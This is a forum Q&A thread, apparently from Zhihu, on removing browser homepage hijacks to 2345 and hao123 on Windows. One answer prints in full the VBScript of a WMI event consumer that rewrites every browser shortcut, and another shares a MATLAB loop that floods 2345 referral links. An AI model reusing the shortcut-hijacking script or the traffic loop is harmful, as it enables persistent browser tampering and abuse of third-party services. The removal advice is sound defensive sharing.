chrome 主頁被劫持,每天首次打開chrome都會進入2345的界面,求助解決辦法?

chrome主頁似乎被劫持,每天開機第一次啟動,Chrome都會打開2345的界面。為解決此問題,我已經查閱諸多解決方案發現均無效。嘗試了如下手段:

一、查看快捷方式是否被修改,結果並無異常,如下圖!

二、修改Chrome設置,修改前「啟動項--打開特定網頁或一組網頁」,選項裡面是有2345的網址的,下方截圖時已經刪除,但每次刪除後,第二天打開還是會有該網址。

三、有人說chrome相應目錄會有old_chrome.exe替換掉chrome.exe,或者說chrome.exe.exe的影響,我的電腦均沒有,也排除這一情況。

四、註冊表修改的方法,查找註冊表搜索http://2345.com,確實搜到一項,不計後果刪除後,第二天打開還是無效,現在搜索註冊表http://2345.com已經沒有相應的項。

五、參照鏈接IE以及其他瀏覽器主頁被劫持到www.2345.com/?kunown的解決辦法 ,利用WMI工具嘗試修改,並沒有找到"unknown_filter",如下圖。

至此,已經嘗試了網上基本上搜索到的大部分方法,但還是沒能解決問題。

求助高手指導!


小馬激活也會造成 Chrome 首次打開時打開 http://2345.com。

解決方法如下:

1、C:WindowsSystem32driversUMDFjihuo.dll;

2、C:WindowsSystem32driversLHPLKernel.sys;

3、C:WindowsSystem32LHPLKC.dat;

4、C:WindowsSystem32driverssurak.sys。

上述文件,先改名,然後重啟刪除。

該操作並不影響激活效果。


---------2016-3-3更新如下----------

一、建議遇到此問題的大家先用殺毒軟體掃描C盤,不要使用半吊子的360、電腦管家和我以前有提到的火絨,也不要使用國內流氓的殺毒軟體如瑞星、毒霸等,建議用卡巴斯基等收費殺毒軟體(可以試用的)。

原因在於:

1.我的電腦之前通過如下方法解決了首頁被劫持問題後,沒有殺毒,今天殺毒殺到兩個木馬。

2.劫持首頁已經是黑產的一部分了,因為有利可圖所以有無數人變著法地劫持,道高一尺魔高一丈,已經出現專為劫持首頁的病毒,我們不知道除了這個表面的劫持動作外是否還有後台的其他動作。

二、如果一定要自己動手,建議不要用半吊子的方法來查殺,直接看這個解答為什麼 Chrome 瀏覽器的主頁會被篡改為 hao123 ?遇到這種情況需要如何進行修復? - dll 其他方法包括我的方法基本都是治標不治本的,而且大家的現象都不太一樣。另外這個回答里提到的工具大部分是微軟官方可以找到的。

---------2015-5-5更新如下----------

更新利用自啟動劫持的情況,現象有:

1.瀏覽器被自動添加到快速啟動欄(或桌面)並被修改主頁,刪除快速啟動欄圖標重啟電腦後無效。

2.瀏覽器只在第一次啟動時打開特定頁面,其餘時候表現正常。

原因是:劫持者使用系統任務計劃或者自啟動程序,在開機或其他特定時間啟動劫持程序(一般是批處理,也可能是註冊一個服務來完成劫持)。劫持程序可能會在運行後刪除自身以防止被發現,也可能運行後生成另一個劫持程序進行劫持操作防止被發現(我都遇到了 )。

解決辦法:1.運行msconfig,找到系統自啟動項,禁用陌生的自啟動項。都陌生的,請禁用全部自啟動項,如果解決了再一次解禁一部分自啟動項來定位有問題的自啟動項。

2.運行taskschd.msc打開任務計劃程序,定位問題方法同上。

3.如果是被註冊成系統服務的,請用殺毒軟體查殺,自己如果查錯了可能會造成很麻煩的後果。想自己動手的注意查看服務項名稱重複的和服務項介紹很少的,劫持首頁的服務項會偽裝成系統原生服務。

4.如果有一個好工具,請直接監視系統目錄全部改動,直接定位到劫持程序的位置刪除之。

---------原答案如下----------

剛剛解決了這個問題,多謝 @空月提供的鏈接,多謝大神 @想了好久 在另一個問題里提供的答案,問題是 chrome 主頁被篡改為hao123?技術宅帶你層層深入破之 - dll 。這裡已經講得很清楚了,我只是按照這裡的原理提供一個大家看得懂的解決方案。

解決的問題是:Chrome IE Firefox或者其它瀏覽器首頁被篡改且無法通過修改主頁的方式修改回來。

解決步驟:

  1. 有一部分人只是桌面的快捷方式被篡改,請右鍵桌面上的快捷方式查找到文件的安裝目錄,嘗試從安裝目錄雙擊啟動瀏覽器,如果首頁正常說明是快捷方式的問題,刪掉快捷方式重新生成一個快捷方式到桌面就解決了。

  2. 如果上述未解決,請嘗試從任務管理器裡面運行瀏覽器程序,如果首頁仍然被修改說明瀏覽器程序有問題,建議重新安裝。
  3. 如果用任務管理器運行後首頁就恢復正常了,說明問題很可能跟explorer進程有關,那麼先看C:Windows下面的explorer.exe程序有無異常,比如修改日期是否異常,有問題的話建議找相同系統的電腦上拷貝一個explorer.exe文件,或者直接重裝系統。
  4. 如果explorer.exe也無問題,那麼看進程鉤子有無異常,一般是DLL文件出問題,不用會看代碼什麼的,我是用火絨軟體裡面的「火絨劍」功能查看的,用鉤子掃描掃描explorer.exe進程,我在目標位置這一欄會有一條指向2345.lc文件的,按著這個路徑在電腦找到這個文件並刪除即可。
  5. 如果以上都未解決,那麼看有沒有奇怪的自啟動項,或者是奇怪的進程,禁用或關閉後試試。


我和你的問題一樣,猜測是用訪問什麼網站的時候有js惡意代碼,本地植入系統進程,然後搶注實現的三無後門。用process monitor 真能把你看瘋,果斷跳過。

樓主可以試試看ComboFix(pixnet.net 的頁面)

關閉所有防毒軟體(包括Windows Defender),下載ComboFix至桌面 ,執行 ComboFix 掃毒。

掃瞄時不要執行其他程式或點擊 ComboFix視窗。

(ComboFix掃毒約10 -20分鐘,唔使裝"修復主控台程式")

完成掃瞄後,ComboFix 報告會自動彈出。

上面我懶得分析去找源頭了,這個和運營商沒關係,理由是我不在國內。

2345的推廣真是為了錢什麼都幹得出來

deepweb還真不能隨便去啊sigh

最後祝你的瀏覽器早日康復,這個問題我會follow

---

最後想了個以其人之道還治其人之身的方法,比較損,直接寫了一段代碼,刷他個而已訪問之後,他的號就被禁了

n = 1;
while n&<500 n=n+1; b = urlread("http://www.2345.com/?12562"); a = urlread("http://www.2345.com/?22174"); if (mod(n,100)==0) n end end

不要問我為什麼是matlab因為剛好做項目開著。。


前幾天剛中了一招,立刻修改了Chrome主頁設置和註冊表,但直到今天才得以真正解決。打開桌面上的Chrome快捷方式沒有問題,但是工具欄的快捷方式反覆解鎖、鎖定,打開都是2345網址導航流氓主頁。最後的解決方法是:1.搜索「quick launch」關鍵字,找到修改時間最新的文件夾,進去發現正常快捷方式被隱藏,鳩佔鵲巢的是修改過的lnk。不用說,直接刪掉惡意文件,恢復舊主。2.開始菜單記憶的常用lnk也被惡意修改。想改回來,發現沒有許可權,懶得再弄,直接刪掉。3.重新搜索chrome.lnk,發現反覆解鎖、鎖定時留下不少餘孽,刪掉。4,修改hosts和防火牆設置,永絕後患。

歸納起來,2345的流氓技術主要有如下一些:

1.修改註冊表、lnk文件,這個眾人應該都比較熟悉了,仔細清理無遺漏即可;

2.WMI列表駐留,算是高級手段,但被討論的次數不少了,無需多說;

3.修改Chrome擴展中的js腳本,注入惡意內容;中招者有必要注意"Users用戶名AppDataLocalGoogleChromeUser DataDefaultExtensions"文件夾,裡面都是擴展,每個擴展文件夾內(包括子文件夾)的所有background.js文件都要仔細檢查,被注入了惡意代碼的擴展最好重裝。

有微軟的工程師說過,2345的手段比較隱蔽,只有在Win操作系統安全機制有明顯改進的情況下才可能真正受到抑制。所以我覺得,多藉助系統的許可權控制、安全軟體的不受歡迎程序檢測功能、HIPS軟體等強力手段,才能真正打死這隻過街老鼠。

==========================================================================

人蠢是沒有辦法治的。昨天晚上下載一本電子書,NOD32沒有任何反應的情況下,桌面突然多出了一個"淘寶網.exe",系統托盤出現「2345在線安裝工具」的提示,於是明白竟然又掉坑裡了,所以還是有必要補充一點。

這一次,打開chrome瀏覽器,主頁被篡改成了「http://www.2345.com/?26510」。查看瀏覽器設置、註冊表和快捷方式,無任何問題;background.js腳本和WMI也無任何異常。於是就傻眼了。

在 @王金耀 朋友回答的啟發下,將chrome.exe重命名為1.exe,打開後主頁是自己設置的baidu,於是判斷,這次問題也可能出在隱藏的病毒文件上。使用Process Explorer對chrome.exe進行查看,發現這些流氓網站還是喜歡互相借鑒的:

對於Win10 64位系統,Ollydbg的運行似乎有些問題,於是指望不上它來尋找兇手了。那麼,如何

才能看穿流氓所做的一切呢?在線程序行為分析是個好東西,藉助於金山火眼,對昨天下載的「exe電子書」進行檢測,答主發現該程序在系統內創建了一堆文件:

經過系統內的搜索,答主發現系統目錄下的其它文件要麼已經不存在,要麼並不是由該程序創建,內容也無可疑之處(那幾個inf文件),只余那個MsImedia.sys驅動程序;至於臨時文件,答主直接Ctrl+A,Shift+Del,一概清理。

找到這個MsImedia.sys之後,首先賦於admin用戶組完全控制的許可權,然後刪除,提示正被被system使用;於是,藉助於Autoruns這款工具,在「驅動」選項卡找到該項目,右鍵刪除;重啟後,主頁恢復正常。刪掉這個惡魔的本體之前,再看看其醜陋的面目吧:

偽裝的很像是系統文件?我是Win10系統,怎麼會有你Win7的自帶驅動?另外,創建時間是很難改的。

以上才是這個程序的主子,祝你們早日倒閉。


chrome 主頁被篡改為hao123?技術宅帶你層層深入破之 - dll

這個就是參考答案


我又發現一個新的情況,作爲前面各個答案的補充:

仍是首先看regedit以及「程序」或「桌面」的啓動項裏有沒有http://2345.com或者itiankong(打開時先是itiankong這個網?,隨後被自動跳轉到2345)的鏈接,有的要刪除。

排除完以後發現仍然新開瀏覽器時被劫持。後來發現是windows下方的任務欄鎖定裏的瀏覽器被改了,而菜單啓動欄並沒有被改。(因爲我把ie、firefox、chrom都鎖定在屏幕下方的任務欄了。)把這幾個快捷啓動解鎖,重新在任務欄打開,這時沒有劫持,再重新鎖回下方的任務欄,好了。


我是更新aslocal中招的.

結果發現ie 和chrome 的主頁同時被篡改。設置里正常,註冊表裡也正常

用ollydbg 打開調試,看載入的dll 無異常,同時主頁沒有被劫持~

修改iE,chrome.exe 的名字後 也無劫持。

懷疑是某dll搞得鬼,用everything 查找.dll 發現一個當日創建的AlDownHelper.dll,刪不掉(提示在資源管理器中打開)用autorun看了下,果然在啟動項里,在註冊表裡刪除,重新啟動後就正常了.


上個月我的主頁也被劫持了,每次打開強制跳轉360導航。

於是我開始百度,發現了這樣一篇文章:

解決近期360劫持瀏覽器問題_chrome吧

我嘗試使用這個帖子所提供的方法去操作,發現沒有用。

但是,我同時也發現了罪魁禍首,雖然跳轉的是360導航,但這並不是360安全衛士乾的,而是新版的魯大師(當然,這貨還是360旗下的),於是卸載魯大師,問題解決。

你可以按照該帖的辦法去操作,查看一下進程模塊中的廠商,定位流氓軟體,並卸載,可能可以解決。


怎麼沒有嘗試一下排除插件擴展?

在地址欄打開:chrome://extensions/

然後看看有沒有裝了什麼可疑的插件


2345惡意腳本發作的原理分析的具體操作請參考Gemini的一篇博客

不過我按照作者的說法下載了VMTool似乎不管用,沒有檢索到unkown的選項

(原創)如何手工去除http://www.2345.com/?kunown惡意鏈接!_Gemini_新浪博客

然後老外寫過一篇文章,大家可以參考

Remove 2345.com homepage (Virus Removal Guide)


剛解決這個問題,我的情況是直接查看快捷方式指向是沒錯的,但是使用ProcessExplorer查看chrome.exe發現含有指向http://2345.com的參數。

解決方法如下:

1. 打開regedit,搜索Mslmedia,刪除

2. 重啟

3. 打開C:windowssystem32drivers,找到Mslmedia.sys刪除

4. 假如上一步刪除不了,右鍵文件點擊「屬性」-&>"安全"-&>"高級"-&>"所有者更改",輸入Administrators,確認。然後「編輯」Adminitrators的許可權為「完全控制」,確認。再刪除。


慚愧的說,樓上的我大都試了,各種改hosts、看快捷方式目標、regedit、msconfig,對於一個半小白來說費老勁了。

最後是360幫我解決的問題。。。

http://bbs.360safe.com/thread-6324009-1-1.html

這是我重啟後首頁劫持問題已經解決後的殘餘項掃描結果。看來是中了iwebar木馬,還有一大堆亂七八糟的dll。

不得不說同行是冤家,流氓對付流氓果然專業。


剛剛遇到這個問題,hao123實在是賤的不行,這個改法殺毒軟體怎麼都不可能找的出來。


我終於解決了,我的ie快捷方式被定位到了http://hao.mark008.com/2345.html,然後開ie就去了2345,參考前面大神的資料用process explorer查看explorer.exe,發現了一個可疑dll,cqsshelper.dll,在一個xygame的文件夾里,搜註冊表發現在一個yxtools的鍵值下,清除此鍵值,重啟,清除cqsshelper.dll以及其所在文件夾,世界重要清凈了。


刪了快捷方式,重新建 ,這個方法親測,有效.


主頁被劫持的方法我也不是太清楚,但是造成的後果我可是表示深深的無奈。

那種感覺怎麼說,就像「一起吃香蕉和冬棗」。(不知道的私信我,或者知乎搜索哈哈哈)

答主嘗試了各種方法,歷經兩天的實踐終於找到了問題的關鍵,希望對題主和其他有困擾的同學有一些參考~

首先,檢查一下Chrome的主頁設置,基本上沒有什麼問題。

你看,沒什麼毛病

然後到chrome的安裝目錄,直接雙擊打開chrome程序,沒有問題。

然後檢查快捷方式。

因為習慣於把chrome固定到任務欄上,一般使用的時候都是點擊任務欄圖標的,但實際上這只是一個快捷方式。

右鍵任務欄chrome圖標-&>右鍵Google Chrome-&>屬性,就會彈出該快捷方式的屬性窗口。發現快捷方式的目標鏈接已經被修改,多加了一個啟動參數:

C:ProgramFiles(x86)GoogleChromeApplicationchrome.exe"http://hao643.com/?r=gggggm=e16 (稍稍修改了一下跳轉鏈接)

題主說無異常的話估計是看了桌面快捷方式的屬性,無異常的圖標打開後的主頁應該不會是2345的網站。

題主可以把它固定到任務欄

從這個屬性中看,應該就會發現了~

然後刪除多餘啟動參數

發現:哎~,好了,很開心。重啟一下,依然是好的。

解決了問題,合上電腦開開心心出去吃飯。等一段時間回來後,打開電腦。

主頁又被修改了,我真的是。。。

在這之後,為了解決問題用了許許多多的殺毒軟體,清理工具等等。測試後,過一段時候回來依舊如故。當時答主的內心真的是萬馬奔騰。(是羊駝)

於是下定決心,不解決這個問題我就不搞學習,哼~

-----------------------------------------我是分割線-----------------------------------------

分析原因:

系統里所有跟瀏覽器的快捷方式都被修改,加了一個啟動參數導致每次被啟動時候都會跳轉到這個網址。除了任務欄快捷方式之外,開始菜單中跟瀏覽器有關的所有快捷方式都無一倖免。

各種解決辦法(可能與上文有重複):

  • 手動刪掉所有快捷方式中,這個方法治標不治本,本來以為這樣可以解決了,結果隔了一段時間,或者重啟系統之後,所有快捷方式又會被惡意修改。
  • 在註冊表中搜索所有跟hao123相關的內容,然後刪除,但是問題仍然存在。
  • 用Everything搜索本地所有跟hao123相關的文件和文件夾,但是刪除之後仍然沒有解決問題。
  • 最後找到了題主說的的方法,但是在WMI event viewer中找不到文中所說的_EventFilter:Name=」unown_filter」
  • 重裝chrome,結果雷同。
  • 把所有chrome快捷方式設為只讀,但是發現一段時間之後還是被惡意修改了。

現在怎麼辦,能半途而廢嗎,不好意思

決定自己來監控進程。工具是這個:ProcessMonitor。

鏈接就先不放了,下文會說明原因滴~

菜單欄 Filter-&>filter,把 chrome的快捷方式路徑 添加到監視中:

注意修改這兩個東西哦~

然後OK運行

這個時候盡量不要進行多餘操作,會多出很多進程,到時候不好找。

Ps:由於此流氓進程太過陰險,運行一次間隔時間會相當長,我也是等待了將近好幾個小時才找到了真兇。所以我並不建議大家像我一樣死磕,浪費時間呀!!如果你真的想一探究竟,私信我,我發給你喲~

這個元兇如上文所說,我已經刪除了,所以我找了個類似截圖給大家看。

沒錯,就是這個罪魁禍首,就是這個叫scrcons.exe的程序在修改chrome的快捷方式

百度之,噗~,流氓軟體的常用招數:三無後門

(「三無」後門的核心就是WMI中的永久事件消費者ActiveScriptEventConsumer)

但是同上文所說,用WMI Event Viewer查看WMI事件,並未在root/subscription裡面找到可疑項。

但是絕對是這個問題無疑!

最後幾番查找,終於在rootCIMV2裡面揪出了真兇。

首先打開WMI Event Viewer,點擊左上角工具欄中的Register for Events按鈕,默認就會連接到rootCIMV2,直接點兩次OK即可。

有些人的問題會是在這裡,但是新的流氓軟體好像知道了這個,所以我和題主第一次並未發現異常。

但是換湯不換藥,他也只是修改了路徑而已。

修改路徑如圖:

雙擊ActiveScriptEventConsumer.Name=」VBScriptKids_consumer」,彈出屬性頁面:

你就會發現元兇原來是它— ScriptText

這個腳本定期就會被系統調用一次,所以就算手動把快捷方式的參數清空,隔一段時間之後又會重新被改回來。

上面的VB腳本是用冒號作為分隔符,把一段程序寫成了一個語句。

為了便於理解,就把這段腳本重新排版了一下:

On Error Resume Next
Const link = "http://hao643.com/?r=gggggm=e16"(劫持鏈接)
Const link360 = "http://hao643.com/?r=gggggm=e16"(劫持鏈接)
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

lnkpaths = "C:UsersPublicDesktop,C:ProgramDataMicrosoftWindowsStart MenuPrograms,C:UserschenxhDesktop,C:UserschenxhAppDataRoamingMicrosoftInternet ExplorerQuick Launch,C:UserschenxhAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedStartMenu,C:UserschenxhAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBar,C:UserschenxhAppDataRoamingMicrosoftWindowsStart MenuPrograms"

browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")

For Each browser In browsersArr
oDic.Add LCase(browser), browser
Next
lnkpathsArr = split(lnkpaths,",")

Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
oFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFolders
If fso.FolderExists(oFolder) Then
For Each file In fso.GetFolder(oFolder).Files
If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
Set oShellLink = WshShell.CreateShortcut(file.Path)
path = oShellLink.TargetPath
name = fso.GetBaseName(path) "." fso.GetExtensionName(path)
If oDic.Exists(LCase(name)) Then
If LCase(name) = LCase("360se.exe") Then
oShellLink.Arguments = link360
Else
oShellLink.Arguments = link
End If
If file.Attributes And 1 Then
file.Attributes = file.Attributes - 1
End If
oShellLink.Save
End If
End If
Next
End If
Next

可以看到,這段腳本就是遍歷所有快捷方式目錄下的所有瀏覽器的快捷方式,然後重新給快捷方式加上啟動參數。

然後怎麼辦?刪刪刪!

右鍵這個,最後一項,刪除!

(Ps:忘了說了,記得剛開始用WMI的時候就以管理員模式運行,這樣刪除的時候就不會提醒沒有許可權了~)

到了這裡,我終於解決了這個大麻煩。心情舒暢,所以就來知乎分享一下嘍,哈哈哈。

這也告訴了我們,以後還是使用良心軟體,不然這樣的流氓真的是防不勝防~


360主頁修復!快整得奔潰了!謝謝360!

(然後把360卸載了..對不起...)


說一個不是辦法的辦法吧,把谷歌快捷方式刪掉,打開谷歌所在文件夾,找到chrome.exe,右擊重命名,隨便命名一個。


補充回答:在電腦裝了一個360,然後清除木馬就把這個問題解決了。額,我對360一個大寫的服……

——————————————

本頁所有方法都嘗試了,依然無法解決,我是嚴重強迫症,感覺快被2345治好了呢,呵呵!


終於傳到了他們是怎麼乾的。。。

傳輸門:

http://wangpai.2345.cn/thread.php?fid=12pid=2620313mail20131025


推薦閱讀:

譚浩強《C語言程序設計》第三版怎麼樣?從零開始學會被帶偏嗎?
計算機網路方面有哪些書籍值得推薦?
計算機科學領域的高大上名詞(中英文)有哪些?
演算法在前端開發的中實際應用有哪些?
編程術語 REPL 正式翻譯成什麼?

TAG:互聯網 | GoogleChrome | 網頁瀏覽器 | 網路安全 | 計算機技術 |